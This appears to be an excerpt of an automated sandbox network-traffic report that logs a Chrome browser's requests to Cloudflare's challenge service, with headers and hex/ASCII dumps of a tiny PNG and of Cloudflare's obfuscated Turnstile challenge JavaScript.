                                                            2024-12-14 09:10:48 UTC1369INData Raw: 36 37 36 29 5d 28 66 5b 67 4d 28 31 35 37 34 29 5d 29 29 3a 66 5b 67 4d 28 31 35 37 34 29 5d 3d 4a 53 4f 4e 5b 67 4d 28 31 39 31 36 29 5d 28 66 5b 67 4d 28 31 35 37 34 29 5d 29 2c 6b 3d 68 7c 7c 69 5b 67 4d 28 35 33 36 29 5d 2c 6c 3d 65 4d 5b 67 4d 28 31 32 37 30 29 5d 5b 67 4d 28 31 33 38 30 29 5d 3f 69 5b 67 4d 28 31 31 31 37 29 5d 28 27 68 2f 27 2b 65 4d 5b 67 4d 28 31 32 37 30 29 5d 5b 67 4d 28 31 33 38 30 29 5d 2c 27 2f 27 29 3a 27 27 2c 6d 3d 69 5b 67 4d 28 31 31 31 37 29 5d 28 69 5b 67 4d 28 31 30 35 35 29 5d 28 69 5b 67 4d 28 39 32 38 29 5d 2b 6c 2b 69 5b 67 4d 28 31 36 32 31 29 5d 2c 31 29 2c 67 4d 28 31 35 32 36 29 29 2b 65 4d 5b 67 4d 28 31 32 37 30 29 5d 5b 67 4d 28 31 37 36 36 29 5d 2b 27 2f 27 2b 65 4d 5b 67 4d 28 31 32 37 30 29 5d 2e 63 48
                                                            Data Ascii: 676)](f[gM(1574)])):f[gM(1574)]=JSON[gM(1916)](f[gM(1574)]),k=h||i[gM(536)],l=eM[gM(1270)][gM(1380)]?i[gM(1117)]('h/'+eM[gM(1270)][gM(1380)],'/'):'',m=i[gM(1117)](i[gM(1055)](i[gM(928)]+l+i[gM(1621)],1),gM(1526))+eM[gM(1270)][gM(1766)]+'/'+eM[gM(1270)].cH
                                                            2024-12-14 09:10:48 UTC1369INData Raw: 29 5b 67 4e 28 34 35 39 29 5d 28 27 7c 27 29 2c 76 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 73 5b 76 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 65 5b 67 4e 28 39 33 39 29 5d 28 44 2c 45 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 49 5b 67 4e 28 37 34 36 29 5d 3d 21 21 5b 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 78 3d 46 5b 67 4e 28 31 32 37 30 29 5d 5b 67 4e 28 38 30 33 29 5d 5b 67 4e 28 31 32 31 34 29 5d 28 67 4e 28 31 36 30 34 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 78 26 26 28 78 5b 67 4e 28 38 38 39 29 5d 5b 67 4e 28 36 39 34 29 5d 3d 67 4e 28 31 31 34 36 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 47 5b 67 4e 28 31 34 36 36 29 5d 5b 67 4e 28 36 31 38 29 5d 28 29 3b 63 6f 6e 74 69
                                                            Data Ascii: )[gN(459)]('|'),v=0;!![];){switch(s[v++]){case'0':e[gN(939)](D,E);continue;case'1':I[gN(746)]=!![];continue;case'2':x=F[gN(1270)][gN(803)][gN(1214)](gN(1604));continue;case'3':x&&(x[gN(889)][gN(694)]=gN(1146));continue;case'4':G[gN(1466)][gN(618)]();conti
                                                            2024-12-14 09:10:48 UTC1369INData Raw: 5d 5b 67 52 28 31 37 31 30 29 5d 2c 73 5b 67 52 28 39 32 33 29 5d 3d 6e 5b 67 52 28 31 35 39 39 29 5d 2c 76 5b 67 52 28 31 36 32 36 29 5d 5b 67 52 28 35 39 32 29 5d 28 73 2c 27 2a 27 29 29 7d 65 6c 73 65 20 65 4d 5b 67 52 28 31 39 31 37 29 5d 28 29 7d 2c 31 65 33 29 3a 28 6c 3d 7b 7d 2c 6c 5b 67 50 28 31 34 32 31 29 5d 3d 64 2c 6c 5b 67 50 28 31 34 32 37 29 5d 3d 65 2c 6c 5b 67 50 28 38 39 30 29 5d 3d 66 2c 6c 5b 67 50 28 31 31 39 37 29 5d 3d 67 2c 6c 5b 67 50 28 31 35 37 34 29 5d 3d 68 2c 6d 3d 6c 2c 65 4d 5b 67 50 28 31 30 37 37 29 5d 28 66 75 6e 63 74 69 6f 6e 28 67 53 29 7b 67 53 3d 67 50 2c 65 4d 5b 67 53 28 39 34 30 29 5d 28 6d 2c 75 6e 64 65 66 69 6e 65 64 2c 67 53 28 31 37 37 35 29 29 7d 2c 31 30 29 2c 65 4d 5b 67 50 28 31 30 37 37 29 5d 28 66 75
                                                            Data Ascii: ][gR(1710)],s[gR(923)]=n[gR(1599)],v[gR(1626)][gR(592)](s,'*'))}else eM[gR(1917)]()},1e3):(l={},l[gP(1421)]=d,l[gP(1427)]=e,l[gP(890)]=f,l[gP(1197)]=g,l[gP(1574)]=h,m=l,eM[gP(1077)](function(gS){gS=gP,eM[gS(940)](m,undefined,gS(1775))},10),eM[gP(1077)](fu
                                                            2024-12-14 09:10:48 UTC1369INData Raw: 28 29 3a 66 62 28 29 7d 2c 31 65 33 29 29 2c 66 53 3d 7b 7d 2c 66 53 5b 67 4a 28 31 34 34 34 29 5d 3d 21 5b 5d 2c 66 53 5b 67 4a 28 31 38 38 30 29 5d 3d 65 55 2c 66 53 5b 67 4a 28 34 37 31 29 5d 3d 66 47 2c 66 53 5b 67 4a 28 31 37 30 34 29 5d 3d 66 4c 2c 66 53 5b 67 4a 28 38 30 39 29 5d 3d 66 4d 2c 66 53 5b 67 4a 28 31 36 36 30 29 5d 3d 66 48 2c 66 53 5b 67 4a 28 31 30 39 39 29 5d 3d 66 4e 2c 66 53 5b 67 4a 28 34 38 30 29 5d 3d 66 4b 2c 66 53 5b 67 4a 28 31 36 36 39 29 5d 3d 66 4a 2c 66 53 5b 67 4a 28 31 36 33 30 29 5d 3d 66 38 2c 66 53 5b 67 4a 28 31 33 39 37 29 5d 3d 66 46 2c 66 53 5b 67 4a 28 36 30 34 29 5d 3d 66 45 2c 66 53 5b 67 4a 28 39 30 31 29 5d 3d 65 5a 2c 66 53 5b 67 4a 28 31 33 35 34 29 5d 3d 66 30 2c 66 53 5b 67 4a 28 38 37 37 29 5d 3d 66 6d
                                                            Data Ascii: ():fb()},1e3)),fS={},fS[gJ(1444)]=![],fS[gJ(1880)]=eU,fS[gJ(471)]=fG,fS[gJ(1704)]=fL,fS[gJ(809)]=fM,fS[gJ(1660)]=fH,fS[gJ(1099)]=fN,fS[gJ(480)]=fK,fS[gJ(1669)]=fJ,fS[gJ(1630)]=f8,fS[gJ(1397)]=fF,fS[gJ(604)]=fE,fS[gJ(901)]=eZ,fS[gJ(1354)]=f0,fS[gJ(877)]=fm
                                                            2024-12-14 09:10:48 UTC1369INData Raw: 74 28 35 32 34 29 5d 28 73 2c 6f 5b 69 74 28 37 31 36 29 5d 28 69 2c 44 29 2c 45 29 3a 46 7c 7c 6f 5b 69 74 28 35 31 30 29 5d 28 73 2c 6f 5b 69 74 28 31 30 34 36 29 5d 28 69 2c 44 29 2c 68 5b 44 5d 29 29 3a 6f 5b 69 74 28 35 31 30 29 5d 28 73 2c 69 2b 44 2c 45 29 2c 43 2b 2b 29 3b 72 65 74 75 72 6e 20 6a 3b 66 75 6e 63 74 69 6f 6e 20 73 28 47 2c 48 2c 69 73 29 7b 69 73 3d 62 2c 4f 62 6a 65 63 74 5b 69 73 28 31 32 38 37 29 5d 5b 69 73 28 31 32 30 33 29 5d 5b 69 73 28 31 34 37 30 29 5d 28 6a 2c 48 29 7c 7c 28 6a 5b 48 5d 3d 5b 5d 29 2c 6a 5b 48 5d 5b 69 73 28 31 34 38 30 29 5d 28 47 29 7d 7d 2c 66 59 3d 67 4a 28 31 33 30 36 29 5b 67 4a 28 34 35 39 29 5d 28 27 3b 27 29 2c 66 5a 3d 66 59 5b 67 4a 28 31 36 38 33 29 5d 5b 67 4a 28 31 31 33 34 29 5d 28 66 59 29
                                                            Data Ascii: t(524)](s,o[it(716)](i,D),E):F||o[it(510)](s,o[it(1046)](i,D),h[D])):o[it(510)](s,i+D,E),C++);return j;function s(G,H,is){is=b,Object[is(1287)][is(1203)][is(1470)](j,H)||(j[H]=[]),j[H][is(1480)](G)}},fY=gJ(1306)[gJ(459)](';'),fZ=fY[gJ(1683)][gJ(1134)](fY)
                                                            2024-12-14 09:10:48 UTC1369INData Raw: 3e 69 7d 2c 27 75 4a 48 61 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 62 49 7a 73 72 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 47 5a 6c 69 50 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 69 7d 2c 27 49 61 4c 47 41 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 6d 71 65 62 63 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 68 7d 2c 27 55 69 79 68 62 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 56 67 5a 76 61 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 49 4c 57 72 4e 27 3a
                                                            Data Ascii: >i},'uJHaz':function(h,i){return h-i},'bIzsr':function(h,i){return h<i},'GZliP':function(h,i){return h===i},'IaLGA':function(h,i){return i==h},'mqebc':function(h,i){return i!=h},'Uiyhb':function(h,i){return i&h},'VgZva':function(h,i){return h(i)},'ILWrN':
                                                            2024-12-14 09:10:48 UTC1369INData Raw: 3c 3c 31 2e 34 32 2c 64 5b 69 79 28 31 38 32 37 29 5d 28 4f 2c 31 29 29 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 69 79 28 31 34 38 30 29 5d 28 64 5b 69 79 28 31 37 37 36 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4f 3d 31 2c 73 3d 30 3b 73 3c 46 3b 48 3d 64 5b 69 79 28 36 34 38 29 5d 28 48 3c 3c 31 2e 37 2c 4f 29 2c 49 3d 3d 64 5b 69 79 28 38 39 33 29 5d 28 6a 2c 31 29 3f 28 49 3d 30 2c 47 5b 69 79 28 31 34 38 30 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3d 30 2c 73 2b 2b 29 3b 66 6f 72 28 4f 3d 43 5b 69 79 28 34 39 33 29 5d 28 30 29 2c 73 3d 30 3b 31 36 3e 73 3b 48 3d 64 5b 69 79 28 31 31 37 38 29 5d 28 64 5b 69 79 28 31 30 32 32 29 5d 28 48 2c 31 29 2c 64 5b 69
                                                            Data Ascii: <<1.42,d[iy(1827)](O,1)),j-1==I?(I=0,G[iy(1480)](d[iy(1776)](o,H)),H=0):I++,O>>=1,s++);}else{for(O=1,s=0;s<F;H=d[iy(648)](H<<1.7,O),I==d[iy(893)](j,1)?(I=0,G[iy(1480)](o(H)),H=0):I++,O=0,s++);for(O=C[iy(493)](0),s=0;16>s;H=d[iy(1178)](d[iy(1022)](H,1),d[i


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            20192.168.2.449775104.18.94.414436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:10:47 UTC739OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ncbj0/0x4AAAAAAA0Iaj6F5in3jjND/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:10:48 UTC240INHTTP/1.1 200 OK
                                                            Date: Sat, 14 Dec 2024 09:10:47 GMT
                                                            Content-Type: image/png
                                                            Content-Length: 61
                                                            Connection: close
                                                            cache-control: max-age=2629800, public
                                                            Server: cloudflare
                                                            CF-RAY: 8f1d10148c49c34e-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-12-14 09:10:48 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                            Data Ascii: PNGIHDRsIDAT$IENDB`


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            21192.168.2.449777104.18.95.414436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:10:49 UTC385OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:10:49 UTC240INHTTP/1.1 200 OK
                                                            Date: Sat, 14 Dec 2024 09:10:49 GMT
                                                            Content-Type: image/png
                                                            Content-Length: 61
                                                            Connection: close
                                                            cache-control: max-age=2629800, public
                                                            Server: cloudflare
                                                            CF-RAY: 8f1d101fad7fde94-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-12-14 09:10:49 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                            Data Ascii: PNGIHDRsIDAT$IENDB`


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            22192.168.2.449778104.18.95.414436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:10:49 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8f1d10088a7d4314&lang=auto HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:10:50 UTC331INHTTP/1.1 200 OK
                                                            Date: Sat, 14 Dec 2024 09:10:50 GMT
                                                            Content-Type: application/javascript; charset=UTF-8
                                                            Content-Length: 114754
                                                            Connection: close
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Server: cloudflare
                                                            CF-RAY: 8f1d1022bc22c328-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-12-14 09:10:50 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 78 45 4a 58 34 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73
                                                            Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.xEJX4={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https
                                                            2024-12-14 09:10:50 UTC1369INData Raw: 65 25 32 30 65 6d 62 65 64 64 65 64 25 32 30 69 6e 74 6f 25 32 30 61 25 32 30 70 61 72 65 6e 74 25 32 30 70 61 67 65 2e 22 2c 22 6f 75 74 64 61 74 65 64 5f 62 72 6f 77 73 65 72 22 3a 22 59 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 6f 75 74 25 32 30 6f 66 25 32 30 64 61 74 65 2e 25 32 30 55 70 64 61 74 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 74 6f 25 32 30 76 69 65 77 25 32 30 74 68 69 73 25 32 30 73 69 74 65 25 32 30 70 72 6f 70 65 72 6c 79 2e 25 33 43 62 72 25 32 46 25 33 45 25 33 43 61 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 32 30 72 65 6c 25 33 44 25 32 32 6e 6f 6f 70 65 6e 65 72 25 32 30 6e 6f 72 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74
                                                            Data Ascii: e%20embedded%20into%20a%20parent%20page.","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22htt
                                                            2024-12-14 09:10:50 UTC1369INData Raw: 67 32 2c 67 33 2c 67 64 2c 67 6f 2c 67 73 2c 67 77 2c 67 78 2c 67 45 2c 65 56 2c 65 57 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 38 33 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 33 33 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 39 32 29 29 2f 33 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 34 30 35 29 29 2f 34 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 34 39 29 29 2f 35 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 39 36 29 29 2f 36 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 37 39 36 29 29 2f 37 29 2b 70 61 72 73 65 49 6e 74 28 67
                                                            Data Ascii: g2,g3,gd,go,gs,gw,gx,gE,eV,eW){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1183))/1*(parseInt(gI(1133))/2)+-parseInt(gI(1092))/3*(parseInt(gI(405))/4)+-parseInt(gI(1449))/5+parseInt(gI(1196))/6*(parseInt(gI(796))/7)+parseInt(g
                                                            2024-12-14 09:10:50 UTC1369INData Raw: 44 29 2c 45 29 3a 46 7c 7c 6f 5b 67 4e 28 39 35 35 29 5d 28 73 2c 69 2b 44 2c 68 5b 44 5d 29 29 3a 6f 5b 67 4e 28 37 33 34 29 5d 28 73 2c 6f 5b 67 4e 28 36 30 31 29 5d 28 69 2c 44 29 2c 45 29 2c 43 2b 2b 29 3b 72 65 74 75 72 6e 20 6a 3b 66 75 6e 63 74 69 6f 6e 20 73 28 47 2c 48 2c 67 4f 29 7b 67 4f 3d 67 4e 2c 4f 62 6a 65 63 74 5b 67 4f 28 36 32 37 29 5d 5b 67 4f 28 36 37 36 29 5d 5b 67 4f 28 31 35 38 39 29 5d 28 6a 2c 48 29 7c 7c 28 6a 5b 48 5d 3d 5b 5d 29 2c 6a 5b 48 5d 5b 67 4f 28 36 39 34 29 5d 28 47 29 7d 7d 2c 65 54 3d 67 4a 28 37 30 32 29 5b 67 4a 28 37 39 34 29 5d 28 27 3b 27 29 2c 65 55 3d 65 54 5b 67 4a 28 37 31 39 29 5d 5b 67 4a 28 31 34 38 31 29 5d 28 65 54 29 2c 65 4d 5b 67 4a 28 37 38 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 67 51
                                                            Data Ascii: D),E):F||o[gN(955)](s,i+D,h[D])):o[gN(734)](s,o[gN(601)](i,D),E),C++);return j;function s(G,H,gO){gO=gN,Object[gO(627)][gO(676)][gO(1589)](j,H)||(j[H]=[]),j[H][gO(694)](G)}},eT=gJ(702)[gJ(794)](';'),eU=eT[gJ(719)][gJ(1481)](eT),eM[gJ(781)]=function(g,h,gQ
                                                            2024-12-14 09:10:50 UTC1369INData Raw: 37 38 32 29 5d 3d 61 79 5b 67 52 28 31 31 33 35 29 5d 7c 7c 67 52 28 31 32 39 30 29 2c 61 7a 5b 67 52 28 31 33 34 31 29 5d 5b 67 52 28 31 30 35 35 29 5d 3d 61 41 5b 67 52 28 33 39 34 29 5d 7c 7c 67 52 28 31 31 37 39 29 2c 61 42 5b 67 52 28 31 33 34 31 29 5d 5b 67 52 28 38 36 35 29 5d 3d 61 43 5b 67 52 28 31 31 37 35 29 5d 2c 61 44 5b 67 52 28 31 33 34 31 29 5d 5b 67 52 28 36 37 32 29 5d 3d 61 45 2e 63 68 7c 7c 27 27 2c 61 46 5b 67 52 28 31 33 34 31 29 5d 5b 67 52 28 31 30 36 34 29 5d 3d 61 47 2e 61 75 7c 7c 27 27 2c 61 48 5b 67 52 28 31 33 34 31 29 5d 5b 67 52 28 31 31 39 30 29 5d 3d 61 49 5b 67 52 28 31 31 39 30 29 5d 7c 7c 7b 7d 2c 61 4a 5b 67 52 28 31 33 34 31 29 5d 5b 67 52 28 38 35 32 29 5d 3d 61 4b 5b 67 52 28 33 31 39 29 5d 7c 7c 30 2c 61 4c 5b 67
                                                            Data Ascii: 782)]=ay[gR(1135)]||gR(1290),az[gR(1341)][gR(1055)]=aA[gR(394)]||gR(1179),aB[gR(1341)][gR(865)]=aC[gR(1175)],aD[gR(1341)][gR(672)]=aE.ch||'',aF[gR(1341)][gR(1064)]=aG.au||'',aH[gR(1341)][gR(1190)]=aI[gR(1190)]||{},aJ[gR(1341)][gR(852)]=aK[gR(319)]||0,aL[g
                                                            2024-12-14 09:10:50 UTC1369INData Raw: 6e 20 68 79 3d 62 2c 65 5b 68 79 28 36 31 33 29 5d 28 69 2c 6a 29 7d 7d 2c 65 4d 5b 65 5b 68 7a 28 39 37 38 29 5d 5d 29 7b 69 66 28 65 5b 68 7a 28 31 32 31 36 29 5d 3d 3d 3d 68 7a 28 31 34 39 33 29 29 65 4d 5b 68 7a 28 31 36 36 35 29 5d 5b 68 7a 28 35 38 38 29 5d 28 29 2c 65 4d 5b 68 7a 28 31 36 36 35 29 5d 5b 68 7a 28 31 32 37 34 29 5d 28 29 2c 65 4d 5b 68 7a 28 35 39 31 29 5d 3d 21 21 5b 5d 2c 65 4d 5b 65 5b 68 7a 28 39 37 38 29 5d 5d 5b 68 7a 28 31 30 34 38 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 68 7a 28 36 35 33 29 2c 27 77 69 64 67 65 74 49 64 27 3a 65 4d 5b 68 7a 28 31 33 34 31 29 5d 5b 68 7a 28 32 39 32 29 5d 2c 27 65 76 65 6e 74 27 3a 65 5b 68 7a 28 31 34 34 33 29 5d 2c 27 63 66 43 68 6c 4f 75 74 27 3a 65 4d 5b 68 7a 28 31 33 34 31 29 5d 5b 68 7a
                                                            Data Ascii: n hy=b,e[hy(613)](i,j)}},eM[e[hz(978)]]){if(e[hz(1216)]===hz(1493))eM[hz(1665)][hz(588)](),eM[hz(1665)][hz(1274)](),eM[hz(591)]=!![],eM[e[hz(978)]][hz(1048)]({'source':hz(653),'widgetId':eM[hz(1341)][hz(292)],'event':e[hz(1443)],'cfChlOut':eM[hz(1341)][hz
                                                            2024-12-14 09:10:50 UTC1369INData Raw: 68 41 28 31 30 35 30 29 5d 3d 4a 53 4f 4e 5b 68 41 28 35 36 39 29 5d 28 67 5b 68 41 28 31 30 35 30 29 5d 2c 4f 62 6a 65 63 74 5b 68 41 28 31 32 36 39 29 5d 28 67 5b 68 41 28 31 30 35 30 29 5d 29 29 3a 67 5b 68 41 28 31 30 35 30 29 5d 3d 4a 53 4f 4e 5b 68 41 28 35 36 39 29 5d 28 67 5b 68 41 28 31 30 35 30 29 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 73 3d 6e 65 77 20 65 4d 5b 28 68 41 28 31 34 39 32 29 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 42 3d 28 78 3d 7b 7d 2c 78 5b 68 41 28 38 37 31 29 5d 3d 65 4d 5b 68 41 28 31 33 34 31 29 5d 5b 68 41 28 38 37 31 29 5d 2c 78 5b 68 41 28 34 31 31 29 5d 3d 65 4d 5b 68 41 28 31 33 34 31 29 5d 5b 68 41 28 34 31 31 29 5d 2c 78 5b 68 41 28 31 34 30 33 29 5d 3d 65 4d 5b 68 41 28
                                                            Data Ascii: hA(1050)]=JSON[hA(569)](g[hA(1050)],Object[hA(1269)](g[hA(1050)])):g[hA(1050)]=JSON[hA(569)](g[hA(1050)]);continue;case'4':s=new eM[(hA(1492))]();continue;case'5':B=(x={},x[hA(871)]=eM[hA(1341)][hA(871)],x[hA(411)]=eM[hA(1341)][hA(411)],x[hA(1403)]=eM[hA(
                                                            2024-12-14 09:10:50 UTC1369INData Raw: 29 5d 3d 64 2c 6d 7d 2c 65 4d 5b 67 4a 28 34 33 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 66 2c 67 2c 68 2c 69 2c 68 44 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 29 7b 28 68 44 3d 67 4a 2c 6a 3d 7b 7d 2c 6a 5b 68 44 28 37 34 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 5e 76 7d 2c 6a 5b 68 44 28 31 34 37 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 5e 76 7d 2c 6a 5b 68 44 28 38 30 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 2b 76 7d 2c 6a 5b 68 44 28 31 30 38 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 76 5e 73 7d 2c 6a 5b 68 44 28 37 35 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 76 5e 73 7d 2c 6a
                                                            Data Ascii: )]=d,m},eM[gJ(435)]=function(e,f,g,h,i,hD,j,k,l,m,n,o){(hD=gJ,j={},j[hD(744)]=function(s,v){return s^v},j[hD(1474)]=function(s,v){return s^v},j[hD(808)]=function(s,v){return s+v},j[hD(1084)]=function(s,v){return v^s},j[hD(756)]=function(s,v){return v^s},j
